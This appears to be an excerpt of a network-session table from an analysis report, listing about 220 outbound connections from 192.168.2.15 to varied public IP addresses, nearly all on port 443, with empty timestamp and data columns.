                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11641192.168.2.1547206171.158.49.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11642192.168.2.155194418.92.51.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11643192.168.2.1551596121.223.248.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11644192.168.2.153335491.200.13.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11645192.168.2.1540274194.179.29.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11646192.168.2.1544350172.108.64.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11647192.168.2.1548380158.6.156.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11648192.168.2.1535100119.193.171.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11649192.168.2.1542996129.5.117.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11650192.168.2.155762075.34.61.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11651192.168.2.1559266192.211.134.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11652192.168.2.1554166105.136.3.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11653192.168.2.155384232.71.188.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11654192.168.2.153311477.183.195.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11655192.168.2.153875053.15.161.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11656192.168.2.154762070.202.129.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11657192.168.2.1541054164.27.99.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11658192.168.2.1552446175.155.25.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11659192.168.2.1558204164.147.22.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11660192.168.2.1555526143.219.160.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11661192.168.2.1554348134.56.5.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11662192.168.2.1545224165.186.152.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11663192.168.2.1536460132.38.16.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11664192.168.2.1534642150.219.76.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11665192.168.2.1538268165.25.120.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11666192.168.2.153626883.178.207.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11667192.168.2.15479022.124.182.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11668192.168.2.155360872.119.25.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11669192.168.2.1545972194.89.7.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11670192.168.2.155429463.141.9.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11671192.168.2.153601824.233.44.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11672192.168.2.154558436.1.191.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11673192.168.2.153590254.40.41.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11674192.168.2.154342442.241.5.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11675192.168.2.15352901.246.5.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11676192.168.2.1549090187.132.33.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11677192.168.2.154475234.250.108.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11678192.168.2.155155450.173.218.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11679192.168.2.154072843.158.137.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11680192.168.2.153378624.183.229.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11681192.168.2.1537992198.177.156.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11682192.168.2.1557740175.104.51.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11683192.168.2.15560928.148.196.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11684192.168.2.1541568196.77.19.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11685192.168.2.1560746203.104.153.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11686192.168.2.1550594207.198.36.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11687192.168.2.154156242.44.239.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11688192.168.2.1535378199.87.61.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11689192.168.2.1549630116.166.242.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11690192.168.2.1546222162.209.230.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11691192.168.2.1558022137.4.21.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11692192.168.2.1538112182.238.209.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11693192.168.2.1560178155.156.156.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11694192.168.2.1533166154.210.36.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11695192.168.2.1554240195.152.34.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11696192.168.2.155119219.91.170.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11697192.168.2.1543742194.109.57.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11698192.168.2.1554096148.122.73.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11699192.168.2.1538836217.87.71.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11700192.168.2.1550324100.198.102.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11701192.168.2.154017637.139.153.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11702192.168.2.153551675.96.102.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11703192.168.2.155292087.22.159.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11704192.168.2.1547068177.187.66.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11705192.168.2.1544538163.238.166.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11706192.168.2.1555414170.157.243.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11707192.168.2.1536050139.61.252.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11708192.168.2.1545298139.7.172.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11709192.168.2.155679414.125.219.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11710192.168.2.155120877.246.211.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11711192.168.2.1543170180.104.231.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11712192.168.2.1552768105.120.117.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11713192.168.2.1541358188.201.70.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11714192.168.2.1553140146.1.42.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11715192.168.2.1547718219.129.123.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11716192.168.2.1544162144.76.160.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11717192.168.2.1538534137.53.230.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11718192.168.2.1545798129.192.118.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11719192.168.2.154047270.59.153.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11720192.168.2.153367278.251.177.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11721192.168.2.1551922128.32.127.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11722192.168.2.155428675.96.142.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11723192.168.2.1553344148.100.22.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11724192.168.2.1535508205.108.41.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11725192.168.2.154637627.200.112.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11726192.168.2.1542032149.19.21.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11727192.168.2.153999834.202.244.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11728192.168.2.1557876189.76.66.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11729192.168.2.153844687.99.197.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11730192.168.2.1539816205.5.248.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11731192.168.2.154166870.104.40.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11732192.168.2.1539358169.44.6.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11733192.168.2.1541722220.212.109.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11734192.168.2.154410018.185.157.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11735192.168.2.1555558197.175.68.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11736192.168.2.1547978161.154.103.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11737192.168.2.1555114194.193.104.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11738192.168.2.1543340205.72.74.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11739192.168.2.1538468175.193.145.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11740192.168.2.15513725.123.250.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11741192.168.2.153346267.172.18.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11742192.168.2.1541492115.1.85.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11743192.168.2.1533322133.102.88.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11744192.168.2.1553366116.154.123.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11745192.168.2.1546472192.31.89.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11746192.168.2.1547948143.195.4.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11747192.168.2.155289651.54.219.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11748192.168.2.153930263.117.226.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11749192.168.2.1534354132.63.63.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11750192.168.2.1545070212.44.33.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11751192.168.2.15567742.72.251.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11752192.168.2.153349843.189.224.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11753192.168.2.155174818.97.134.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11754192.168.2.154902857.107.59.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11755192.168.2.1551602185.105.81.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11756192.168.2.1532806108.82.160.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11757192.168.2.154951643.40.97.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11758192.168.2.1557934188.163.217.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11759192.168.2.154172627.38.242.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11760192.168.2.1546474126.30.139.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11761192.168.2.1537324137.119.17.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11762192.168.2.154127858.126.69.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11763192.168.2.1538754210.221.0.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11764192.168.2.1540126179.125.105.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11765192.168.2.154783817.148.13.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11766192.168.2.154356818.150.141.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11767192.168.2.154455083.207.14.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11768192.168.2.1550280139.103.232.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11769192.168.2.1533524126.38.163.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11770192.168.2.1550892114.137.151.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11771192.168.2.154129031.105.64.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11772192.168.2.155599859.212.63.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11773192.168.2.1536760173.241.27.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11774192.168.2.15597408.138.220.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11775192.168.2.1545512106.16.114.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11776192.168.2.1546128209.52.116.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11777192.168.2.154891871.217.118.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11778192.168.2.1535816221.101.139.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11779192.168.2.154368434.52.187.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11780192.168.2.1549060134.34.139.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11781192.168.2.1557932107.210.224.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11782192.168.2.1556692136.57.142.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11783192.168.2.1548404164.226.73.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11784192.168.2.153371818.127.95.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11785192.168.2.1558552167.225.149.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11786192.168.2.1549652222.123.152.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11787192.168.2.155765281.236.98.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11788192.168.2.154687474.23.228.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11789192.168.2.1550726161.171.193.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11790192.168.2.1542252120.182.126.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11791192.168.2.15506748.62.12.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11792192.168.2.155127685.255.133.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11793192.168.2.155010672.235.12.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11794192.168.2.1541146217.18.172.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11795192.168.2.155881632.120.97.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11796192.168.2.155004686.59.90.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11797192.168.2.1542210195.23.74.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11798192.168.2.153389893.1.12.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11799192.168.2.1548940197.246.196.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11800192.168.2.155772432.222.101.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11801192.168.2.155428689.92.144.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11802192.168.2.1542470155.76.199.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11803192.168.2.154659262.11.39.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11804192.168.2.1559076186.141.251.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11805192.168.2.154033054.221.13.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11806192.168.2.154889072.5.49.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11807192.168.2.1534502189.239.64.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11808192.168.2.156097857.152.247.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11809192.168.2.15561628.58.23.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11810192.168.2.1560232150.240.89.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11811192.168.2.1549690156.0.254.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11812192.168.2.155013045.107.17.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11813192.168.2.1548654208.165.221.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11814192.168.2.1556988166.118.161.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11815192.168.2.153870051.253.52.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11816192.168.2.1553480203.167.31.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11817192.168.2.1546388129.173.103.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11818192.168.2.155932257.102.237.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11819192.168.2.154010694.135.5.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11820192.168.2.1559542205.21.218.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11821192.168.2.1546578166.167.81.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11822192.168.2.1551966205.42.199.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11823192.168.2.1558120183.21.152.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11824192.168.2.154907024.182.11.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11825192.168.2.154005861.157.186.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11826192.168.2.1558982193.228.103.08080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11827192.168.2.155193466.184.89.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11828192.168.2.155629686.80.68.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11829192.168.2.1537300152.247.165.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11830192.168.2.1543148156.37.39.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11831192.168.2.1535566216.191.62.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11832192.168.2.155453473.215.154.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11833192.168.2.1538782156.54.165.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11834192.168.2.153928238.118.180.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11835192.168.2.155187692.150.97.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11836192.168.2.154805090.250.157.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11837192.168.2.1540680212.39.182.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11838192.168.2.1540966114.36.150.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11839192.168.2.155267260.94.168.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11840192.168.2.154850070.179.162.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11841192.168.2.153708252.227.180.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11842192.168.2.1554972152.124.112.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11843192.168.2.154673897.254.111.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11844192.168.2.154304632.182.136.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11845192.168.2.1545462220.201.219.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11846192.168.2.1533424125.111.203.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11847192.168.2.1542084140.31.195.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11848192.168.2.1532932220.72.254.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11849192.168.2.1539082196.186.229.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11850192.168.2.1549984164.106.162.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11851192.168.2.154703054.132.12.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11852192.168.2.155366479.169.106.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11853192.168.2.1541648187.90.253.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11854192.168.2.1544844114.236.250.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11855192.168.2.1539348139.219.0.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11856192.168.2.1555160153.90.193.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11857192.168.2.1535420114.192.193.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11858192.168.2.154313483.90.66.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11859192.168.2.155183472.247.72.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11860192.168.2.154137634.78.117.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11861192.168.2.1537274155.70.98.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11862192.168.2.153353489.220.30.197443
